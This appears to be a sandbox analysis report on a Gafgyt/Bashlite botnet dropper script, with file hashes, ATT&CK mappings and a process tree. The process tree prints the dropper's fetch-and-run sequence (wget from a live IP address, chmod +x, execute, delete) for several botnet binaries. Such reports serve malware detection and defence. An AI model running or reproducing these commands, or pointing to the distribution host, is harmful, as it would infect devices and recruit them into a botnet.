gafgyt | 6594875b01074eed48ca4021e4079aefb23565c88d5eccab3939241746347417

Analysis

max time kernel
8s
max time network
17s
platform
debian-9_armhf
resource
debian9-armhf-20240611-en
resource tags

arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
submitted
07-12-2024 14:41

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

logsbins.sh
Size

6KB
MD5

b853a7496951ffa293c154a1c2ab0cef
SHA1

cd23d84bfa383cb3eef6b8a210a755323d278068
SHA256

6594875b01074eed48ca4021e4079aefb23565c88d5eccab3939241746347417
SHA512

315201607fbfeb29173ced022cebb46a1c936377bb62407fdb73bb9a65426e24aff333c7e727e5fbb7351de6f71f919e1dcec3204b41d01d781dfcfc171bab18
SSDEEP

96:vl0lolAlUlElAlwlclElElglUl6LlbzPnTjn37jjHTLXjTp+FH7RjdOMX+xj+wqd:oMVB3

Score

10^/10

gafgyt botnet defense_evasion discovery

Malware Config

Signatures

Detected Gafgyt variant 5 IoCs

resource	yara_rule
behavioral2/files/fstream-1.dat	family_gafgyt
behavioral2/files/fstream-2.dat	family_gafgyt
behavioral2/files/fstream-3.dat	family_gafgyt
behavioral2/files/fstream-4.dat	family_gafgyt
behavioral2/files/fstream-5.dat	family_gafgyt

Gafgyt family
gafgyt
Gafgyt/Bashlite
IoT botnet with numerous variants first seen in 2014.
botnet gafgyt

File and Directory Permissions Modification 1 TTPs 5 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
701	chmod
709	chmod
673	chmod
686	chmod
695	chmod

Executes dropped EXE 5 IoCs

ioc	pid	Process
/tmp/m-.ips	676	m-.ips
/tmp/m-i.p.-se.l	688	m-i.p.-se.l
/tmp/s-..-h-.4	696	s-..-h-.4
/tmp/x.8-.-6.-	702	x.8-.-6.-
/tmp/a.-r.-m6	710	a.-r.-m6

Modifies Watchdog functionality 1 TTPs 2 IoCs

Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

defense_evasion

Impair Defenses

T1562

description	ioc	Process
File opened for modification	/dev/watchdog	a.-r.-m6
File opened for modification	/dev/misc/watchdog	a.-r.-m6

Reads system routing table 1 TTPs 1 IoCs

Gets active network interfaces from /proc virtual filesystem.

discovery

Internet Connection Discovery

T1016.001

description	ioc	Process
File opened for reading	/proc/net/route	a.-r.-m6

Changes its process name 1 IoCs

description	ioc	pid	Process
Changes the process name, possibly in an attempt to hide itself	sshd	710	a.-r.-m6

Reads system network configuration 1 TTPs 1 IoCs

Uses contents of /proc filesystem to enumerate network settings.

discovery

Internet Connection Discovery

T1016.001

description	ioc	Process
File opened for reading	/proc/net/route	a.-r.-m6

System Network Configuration Discovery 1 TTPs 3 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
661	wget
676	m-.ips
679	rm

Writes file to tmp directory 5 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/m-.ips	wget
File opened for modification	/tmp/m-i.p.-se.l	wget
File opened for modification	/tmp/s-..-h-.4	wget
File opened for modification	/tmp/x.8-.-6.-	wget
File opened for modification	/tmp/a.-r.-m6	wget

/tmp/logsbins.sh
/tmp/logsbins.sh
1⤵
PID:658
- /usr/bin/wget
  wget http://93.123.85.60/m-.ips
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:661
- /bin/chmod
  chmod +x m-.ips
  2⤵
  - File and Directory Permissions Modification
  PID:673
- /tmp/m-.ips
  ./m-.ips
  2⤵
  - Executes dropped EXE
  - System Network Configuration Discovery
  PID:676
- /bin/rm
  rm -rf m-.ips
  2⤵
  - System Network Configuration Discovery
  PID:679
- /usr/bin/wget
  wget http://93.123.85.60/m-i.p.-se.l
  2⤵
  - Writes file to tmp directory
  PID:681
- /bin/chmod
  chmod +x m-i.p.-se.l
  2⤵
  - File and Directory Permissions Modification
  PID:686
- /tmp/m-i.p.-se.l
  ./m-i.p.-se.l
  2⤵
  - Executes dropped EXE
  PID:688
- /bin/rm
  rm -rf m-i.p.-se.l
  2⤵
  PID:690
- /usr/bin/wget
  wget http://93.123.85.60/s-..-h-.4
  2⤵
  - Writes file to tmp directory
  PID:692
- /bin/chmod
  chmod +x s-..-h-.4
  2⤵
  - File and Directory Permissions Modification
  PID:695
- /tmp/s-..-h-.4
  ./s-..-h-.4
  2⤵
  - Executes dropped EXE
  PID:696
- /bin/rm
  rm -rf s-..-h-.4
  2⤵
  PID:698
- /usr/bin/wget
  wget http://93.123.85.60/x.8-.-6.-
  2⤵
  - Writes file to tmp directory
  PID:700
- /bin/chmod
  chmod +x x.8-.-6.-
  2⤵
  - File and Directory Permissions Modification
  PID:701
- /tmp/x.8-.-6.-
  ./x.8-.-6.-
  2⤵
  - Executes dropped EXE
  PID:702
- /bin/rm
  rm -rf x.8-.-6.-
  2⤵
  PID:705
- /usr/bin/wget
  wget http://93.123.85.60/a.-r.-m6
  2⤵
  - Writes file to tmp directory
  PID:706
- /bin/chmod
  chmod +x a.-r.-m6
  2⤵
  - File and Directory Permissions Modification
  PID:709
- /tmp/a.-r.-m6
  ./a.-r.-m6
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Reads system routing table
  - Changes its process name
  - Reads system network configuration
  PID:710
- /bin/rm
  rm -rf a.-r.-m6
  2⤵
  PID:714
- /usr/bin/wget
  wget http://93.123.85.60/i--6.-.86
  2⤵
  PID:715

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Impair Defenses

T1562

Credential Access

Discovery

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/a.-r.-m6

Filesize
172KB

MD5
e346eb40056eb3c499f2437f8a85d278

SHA1
3c76ff0831acc148ab8443bffd659d4b3a80b8c0

SHA256
ed6d520707ff72175f5e44b96e78de20e8db2786cd4c16d686b4fb2aad7c9399

SHA512
2282c2697fda354deabcd5ebed428e969d50e814d7f8981343b76f9481daa5c3a2244e1f1731973d76c87953dbd7028776dcf32f96535c3997f60f4d50f04eea

Download Submit
/tmp/m-.ips

Filesize
173KB

MD5
0f6aed653ea1b2ddf6c62e0d63b9942e

SHA1
8e3e0d4adf81c2504724f18cb54ebc50b8a5219e

SHA256
1b2dcd476d1f2fb510c5ef30f49a680c538ed22a51e066bf81e0201f12d8a6ea

SHA512
6c928b63a9d3ffd3863396bc11c30052e69ece6d1510f9b7ce9e496ca283a36f61d3b92423ef856ad12981021995ddef49e76aa42afe690fa83629fa8e64c1f1

Download Submit
/tmp/m-i.p.-se.l

Filesize
173KB

MD5
e342e6e55fc96346dbf8048bc23be7a2

SHA1
83ecbffacd473393a322380adbc55760b2130bf8

SHA256
1fb9578c41203a3be431f1873875141f0efed6099077f9fd0dc3544b4d21bd74

SHA512
0d088cbec9fa94d424d33d10d9ec82ce8a1d37c2f9eabb0346adc979cb55a1c7b6901867665cbc2364a3cf55f0524c7c91f0b590c724d9e60dea5cf73fb1a2df

Download Submit
/tmp/s-..-h-.4

Filesize
119KB

MD5
c63009396462fb713ccbdc1917a1bcde

SHA1
40a39ce6fb7ef7f845d02b747e06cccc0627522d

SHA256
386ecb26e8582f49fb4ee73cdf1201ba7e9aa24f327ccdf18c56eb3a40fa09c0

SHA512
a62e29e238df261fdcabed974841a142ffb5ad7c3845cc6c7af0b8e2c828e31f3e059d401cca667c0784524b7a9e3e325be6af79693d0abd2da17f3b91e6a6b4

Download Submit
/tmp/x.8-.-6.-

Filesize
124KB

MD5
529714109cae9394a028d64b0f4575d1

SHA1
69cf98d8598b6dfaac2d45ef61251db49de80db2

SHA256
e9d283427fe848cc83fbb538fdfcd06f4f92c2f566fc21cf1158ef0a36c56fa4

SHA512
1b808c98534c1c29a5f71761ea1de2299d9fe1c32cf24838ee406354e2e7d68ca8ac1e8c480009c97c41ecff5028fbbdede85a80b21135d888f1d8474224cf6d

Download Submit

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads